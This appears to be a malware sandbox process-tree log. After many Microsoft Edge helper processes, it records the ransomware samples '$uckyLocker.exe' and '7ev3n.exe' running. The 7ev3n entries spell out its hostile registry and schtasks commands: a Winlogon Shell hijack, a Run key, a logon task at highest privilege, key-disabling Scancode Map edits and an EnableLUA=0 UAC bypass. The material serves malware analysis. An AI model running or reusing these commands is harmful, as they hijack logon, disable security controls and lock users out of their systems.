C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5024,i,3880530741439701898,11591659416169771069,262144 --variations-seed-version --mojo-platform-channel-handle=5028 /prefetch:83⤵PID:1500
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5336,i,3880530741439701898,11591659416169771069,262144 --variations-seed-version --mojo-platform-channel-handle=5344 /prefetch:83⤵PID:4188
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5196,i,3880530741439701898,11591659416169771069,262144 --variations-seed-version --mojo-platform-channel-handle=3476 /prefetch:83⤵PID:2320
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --always-read-main-dll --field-trial-handle=4972,i,3880530741439701898,11591659416169771069,262144 --variations-seed-version --mojo-platform-channel-handle=4948 /prefetch:13⤵PID:5588
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --always-read-main-dll --field-trial-handle=5224,i,3880530741439701898,11591659416169771069,262144 --variations-seed-version --mojo-platform-channel-handle=5104 /prefetch:13⤵PID:820
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --always-read-main-dll --field-trial-handle=3440,i,3880530741439701898,11591659416169771069,262144 --variations-seed-version --mojo-platform-channel-handle=5236 /prefetch:13⤵PID:2212
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --always-read-main-dll --field-trial-handle=5712,i,3880530741439701898,11591659416169771069,262144 --variations-seed-version --mojo-platform-channel-handle=5736 /prefetch:13⤵PID:5644
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5888,i,3880530741439701898,11591659416169771069,262144 --variations-seed-version --mojo-platform-channel-handle=5920 /prefetch:83⤵PID:4488
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5912,i,3880530741439701898,11591659416169771069,262144 --variations-seed-version --mojo-platform-channel-handle=5996 /prefetch:83⤵PID:3564
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --always-read-main-dll --field-trial-handle=6312,i,3880530741439701898,11591659416169771069,262144 --variations-seed-version --mojo-platform-channel-handle=6356 /prefetch:13⤵PID:752
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --always-read-main-dll --field-trial-handle=3464,i,3880530741439701898,11591659416169771069,262144 --variations-seed-version --mojo-platform-channel-handle=6524 /prefetch:13⤵PID:4400
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5056,i,3880530741439701898,11591659416169771069,262144 --variations-seed-version --mojo-platform-channel-handle=6780 /prefetch:83⤵PID:2840
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6688,i,3880530741439701898,11591659416169771069,262144 --variations-seed-version --mojo-platform-channel-handle=6792 /prefetch:83⤵PID:880
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5624,i,3880530741439701898,11591659416169771069,262144 --variations-seed-version --mojo-platform-channel-handle=4904 /prefetch:83⤵PID:4556
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5844,i,3880530741439701898,11591659416169771069,262144 --variations-seed-version --mojo-platform-channel-handle=6892 /prefetch:83⤵PID:4112
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5844,i,3880530741439701898,11591659416169771069,262144 --variations-seed-version --mojo-platform-channel-handle=6892 /prefetch:83⤵PID:1488
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --always-read-main-dll --field-trial-handle=6828,i,3880530741439701898,11591659416169771069,262144 --variations-seed-version --mojo-platform-channel-handle=3592 /prefetch:13⤵PID:3996
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5324,i,3880530741439701898,11591659416169771069,262144 --variations-seed-version --mojo-platform-channel-handle=5852 /prefetch:83⤵PID:2944
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6388,i,3880530741439701898,11591659416169771069,262144 --variations-seed-version --mojo-platform-channel-handle=5796 /prefetch:83⤵PID:3084
-
-
C:\Users\Admin\Downloads\$uckyLocker.exe"C:\Users\Admin\Downloads\$uckyLocker.exe"3⤵
- Executes dropped EXE
- Sets desktop wallpaper using registry
- System Location Discovery: System Language Discovery
PID:5180
-
-
C:\Users\Admin\Downloads\$uckyLocker.exe"C:\Users\Admin\Downloads\$uckyLocker.exe"3⤵
- Executes dropped EXE
- Sets desktop wallpaper using registry
- System Location Discovery: System Language Discovery
PID:5436
-
-
C:\Users\Admin\Downloads\$uckyLocker.exe"C:\Users\Admin\Downloads\$uckyLocker.exe"3⤵
- Executes dropped EXE
- Sets desktop wallpaper using registry
PID:1940
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5720,i,3880530741439701898,11591659416169771069,262144 --variations-seed-version --mojo-platform-channel-handle=5256 /prefetch:83⤵PID:752
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6272,i,3880530741439701898,11591659416169771069,262144 --variations-seed-version --mojo-platform-channel-handle=5976 /prefetch:83⤵PID:1688
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5976,i,3880530741439701898,11591659416169771069,262144 --variations-seed-version --mojo-platform-channel-handle=6360 /prefetch:83⤵PID:2340
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5176,i,3880530741439701898,11591659416169771069,262144 --variations-seed-version --mojo-platform-channel-handle=3620 /prefetch:83⤵PID:3272
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5268,i,3880530741439701898,11591659416169771069,262144 --variations-seed-version --mojo-platform-channel-handle=6160 /prefetch:83⤵PID:2964
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5784,i,3880530741439701898,11591659416169771069,262144 --variations-seed-version --mojo-platform-channel-handle=7140 /prefetch:83⤵PID:2212
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7316,i,3880530741439701898,11591659416169771069,262144 --variations-seed-version --mojo-platform-channel-handle=7328 /prefetch:83⤵PID:1812
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7336,i,3880530741439701898,11591659416169771069,262144 --variations-seed-version --mojo-platform-channel-handle=7324 /prefetch:83⤵PID:5672
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7444,i,3880530741439701898,11591659416169771069,262144 --variations-seed-version --mojo-platform-channel-handle=4940 /prefetch:83⤵PID:4976
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --always-read-main-dll --field-trial-handle=6796,i,3880530741439701898,11591659416169771069,262144 --variations-seed-version --mojo-platform-channel-handle=6384 /prefetch:13⤵PID:4512
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --always-read-main-dll --field-trial-handle=5908,i,3880530741439701898,11591659416169771069,262144 --variations-seed-version --mojo-platform-channel-handle=3468 /prefetch:13⤵PID:4652
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5504,i,3880530741439701898,11591659416169771069,262144 --variations-seed-version --mojo-platform-channel-handle=5960 /prefetch:83⤵PID:5148
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4988,i,3880530741439701898,11591659416169771069,262144 --variations-seed-version --mojo-platform-channel-handle=5532 /prefetch:83⤵PID:4600
-
-
C:\Users\Admin\Downloads\7ev3n.exe"C:\Users\Admin\Downloads\7ev3n.exe"3⤵
- Blocklisted process makes network request
- Executes dropped EXE
PID:1132 -
C:\Users\Admin\AppData\Local\system.exe"C:\Users\Admin\AppData\Local\system.exe"4⤵
- Executes dropped EXE
PID:5844 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\del.bat5⤵
- System Location Discovery: System Language Discovery
PID:5108
-
-
C:\Windows\SysWOW64\SCHTASKS.exeC:\Windows\System32\SCHTASKS.exe /create /SC ONLOGON /TN uac /TR "C:\Users\Admin\AppData\Local\bcd.bat" /RL HIGHEST /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2204
-
-
C:\windows\SysWOW64\cmd.exeC:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:645⤵PID:3692
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:646⤵
- Modifies WinLogon for persistence
PID:6036
-
-
-
C:\windows\SysWOW64\cmd.exeC:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:645⤵PID:1584
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:646⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:5116
-
-
-
C:\windows\SysWOW64\cmd.exeC:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:645⤵
- System Location Discovery: System Language Discovery
PID:4880 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:646⤵
- System Location Discovery: System Language Discovery
PID:2448
-
-
-
C:\windows\SysWOW64\cmd.exeC:\windows\system32\cmd.exe /c REG ADD "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d 506 /f /reg:645⤵PID:1132
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d 506 /f /reg:646⤵
- System Location Discovery: System Language Discovery
PID:3620
-
-
-
C:\windows\SysWOW64\cmd.exeC:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "rgd_bcd_condition" /t REG_SZ /d 1 /f /reg:645⤵
- System Location Discovery: System Language Discovery
PID:4248 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "rgd_bcd_condition" /t REG_SZ /d 1 /f /reg:646⤵
- System Location Discovery: System Language Discovery
PID:5864
-
-
-
C:\windows\SysWOW64\cmd.exeC:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f /reg:645⤵
- System Location Discovery: System Language Discovery
PID:3068 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f /reg:646⤵
- UAC bypass
PID:3480
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5844 -s 13565⤵
- Program crash
PID:4420
-
-
-
-
C:\Users\Admin\Downloads\7ev3n.exe"C:\Users\Admin\Downloads\7ev3n.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1516 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\del.bat4⤵PID:2832
-
-
C:\Windows\SysWOW64\SCHTASKS.exeC:\Windows\System32\SCHTASKS.exe /create /SC ONLOGON /TN uac /TR "C:\Users\Admin\AppData\Local\bcd.bat" /RL HIGHEST /f4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2980
-
-
C:\windows\SysWOW64\cmd.exeC:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:644⤵PID:5996
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:645⤵
- Modifies WinLogon for persistence
- System Location Discovery: System Language Discovery
PID:2088
-
-
-
C:\windows\SysWOW64\cmd.exeC:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:644⤵
- System Location Discovery: System Language Discovery
PID:2184 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:645⤵
- Adds Run key to start application
PID:3208
-
-
-
C:\windows\SysWOW64\cmd.exeC:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:644⤵
- System Location Discovery: System Language Discovery
PID:6060 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:645⤵
- System Location Discovery: System Language Discovery
PID:264
-
-
-
C:\windows\SysWOW64\cmd.exeC:\windows\system32\cmd.exe /c REG ADD "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d 506 /f /reg:644⤵
- System Location Discovery: System Language Discovery
PID:976 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d 506 /f /reg:645⤵PID:1068
-
-
-
C:\windows\SysWOW64\cmd.exeC:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "rgd_bcd_condition" /t REG_SZ /d 1 /f /reg:644⤵
- System Location Discovery: System Language Discovery
PID:3552 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "rgd_bcd_condition" /t REG_SZ /d 1 /f /reg:645⤵
- System Location Discovery: System Language Discovery
PID:3340
-
-
-
C:\windows\SysWOW64\cmd.exeC:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f /reg:644⤵
- System Location Discovery: System Language Discovery
PID:5568 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:5672
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f /reg:645⤵
- UAC bypass
- System Location Discovery: System Language Discovery
PID:1540
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1516 -s 13284⤵
- Program crash
PID:4896
-
-
-
C:\Users\Admin\Downloads\7ev3n.exe"C:\Users\Admin\Downloads\7ev3n.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5800 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\del.bat4⤵PID:4372
-
-
C:\Windows\SysWOW64\SCHTASKS.exeC:\Windows\System32\SCHTASKS.exe /create /SC ONLOGON /TN uac /TR "C:\Users\Admin\AppData\Local\bcd.bat" /RL HIGHEST /f4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2840
-
-
C:\windows\SysWOW64\cmd.exeC:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:644⤵PID:3416
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:645⤵
- Modifies WinLogon for persistence
PID:1284
-
-
-
C:\windows\SysWOW64\cmd.exeC:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:644⤵PID:1536
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:645⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:2212
-
-
-
C:\windows\SysWOW64\cmd.exeC:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:644⤵
- System Location Discovery: System Language Discovery
PID:212 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:645⤵PID:1540
-
-
-
C:\windows\SysWOW64\cmd.exeC:\windows\system32\cmd.exe /c REG ADD "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d 506 /f /reg:644⤵
- System Location Discovery: System Language Discovery
PID:5964 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d 506 /f /reg:645⤵
- System Location Discovery: System Language Discovery
PID:6100
-
-
-
C:\windows\SysWOW64\cmd.exeC:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "rgd_bcd_condition" /t REG_SZ /d 1 /f /reg:644⤵
- System Location Discovery: System Language Discovery
PID:2288 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "rgd_bcd_condition" /t REG_SZ /d 1 /f /reg:645⤵PID:4192
-
-
-
C:\windows\SysWOW64\cmd.exeC:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f /reg:644⤵
- System Location Discovery: System Language Discovery
PID:4356 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f /reg:645⤵
- UAC bypass
PID:1056
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5800 -s 13364⤵
- Program crash
PID:3476
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=3592,i,3880530741439701898,11591659416169771069,262144 --variations-seed-version --mojo-platform-channel-handle=7360 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
PID:5272
-
-
